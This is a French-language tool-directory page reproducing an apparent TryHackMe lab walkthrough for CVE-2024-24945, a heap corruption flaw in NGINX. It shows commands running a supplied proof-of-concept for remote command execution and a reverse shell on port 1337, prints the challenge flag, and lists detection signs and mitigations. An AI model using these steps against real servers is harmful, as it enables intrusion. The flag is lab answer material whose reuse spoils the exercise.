Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough — Ce laboratoire démontre l'exploitation de la CVE-2024-24945, une vulnérabilité de corruption du tas affectant NGINX. L'objectif était de comprendre comment la corruption de la mémoire peut conduire à une exécution de code à distance (RCE) et d'acquérir une expérience pratique des techniques d'exploitation, de détection et d'atténuation. | Kitploit
Outils/GitHubGitHub/benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationExploitation de BinairesLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

Voir le dépôt
il y a 2 moisPas encore vérifié

À propos

Ce laboratoire démontre l'exploitation de la CVE-2024-24945, une vulnérabilité de corruption du tas affectant NGINX. L'objectif était de comprendre comment la corruption de la mémoire peut conduire à une exécution de code à distance (RCE) et d'acquérir une expérience pratique des techniques d'exploitation, de détection et d'atténuation.

Partager

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

Ce laboratoire illustre l'exploitation de CVE-2024-24945, une vulnérabilité de corruption du tas affectant NGINX. L'objectif était de comprendre comment une corruption mémoire peut conduire à une exécution de code à distance (RCE) et d'acquérir une expérience pratique des techniques d'exploitation, de détection et d'atténuation.

Objectifs

. Vérifier le service NGINX vulnérable. . Exécuter des commandes arbitraires à l'aide de la preuve de concept (PoC) fournie. . Obtenir un shell inversé sur le conteneur cible. . Récupérer le drapeau du défi. . Comprendre les stratégies de détection et d'atténuation.

Environnement du laboratoire

. Plateforme : TryHackMe . Service cible : NGINX RIFT . Environnement conteneurisé : Docker . Outil d'exploitation : poc.py . Méthode d'accès : VNC (Virtual Network Computing)

Méthodologie

  1. Vérification du service

  2. a confirmé que le conteneur vulnérable était en cours d'exécution et accessible.

  3. root@kitploit:~
    sudo docker ps
    curl -s http://127.0.0.1:19321/api/users/42
    

backend ok

  1. Exécution de code à distance

Exécution de la PoC fournie pour valider l'exécution de commandes arbitraires.

root@kitploit:~
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned

Vérification de l'exécution réussie :

root@kitploit:~
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned

Sortie : hello from depthfirst

Accès au shell inversé

Établissez un shell interactif sur le conteneur cible.

root@kitploit:~
python3 poc.py --shell

Connexion réussie :

[] listening for reverse shell on port 1337... [] connected. $

  1. Récupération du drapeau

Accès au drapeau du défi.

root@kitploit:~
cat /flag.txt

Drapeau :

THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}

Opportunités de détection

Les défenseurs peuvent identifier les tentatives d'exploitation via :

. Crash du worker NGINX . Événements de défaut de segmentation . Connexions réseau sortantes inattendues . Processus shell suspects (/bin/sh, bash) . Création de fichiers non autorisée dans les répertoires temporaires

Stratégies d'atténuation

. Mettez à niveau vers une version patchée de NGINX. . Appliquez le principe du moindre privilège. . Restreignez le trafic réseau sortant inutile. . Mettez en place une surveillance continue des journaux. . Utilisez des contrôles de sécurité des conteneurs et une surveillance en temps réel.

Principaux enseignements

Ce laboratoire a fourni une expérience pratique pour :

. Comprendre les vulnérabilités de corruption du tas. . Exploitation des failles d'exécution de code à distance. . Établissement de shells inversés. . Réalisation d'une validation post-exploitation. . Reconnaissance des indicateurs de compromission et des techniques d'atténuation.

Avertissement

Cet exercice a été réalisé dans un environnement de laboratoire TryHackMe contrôlé à des fins éducatives et défensives de cybersécurité uniquement.

Auteur : [Benedict Ejepu Amaechi] Plateforme : TryHackMe Sujet : CVE-2024-24945 9NGINX RIFT0 Exploitation et Défense Date d'achèvement : Juin 2026

Télécharger l’outil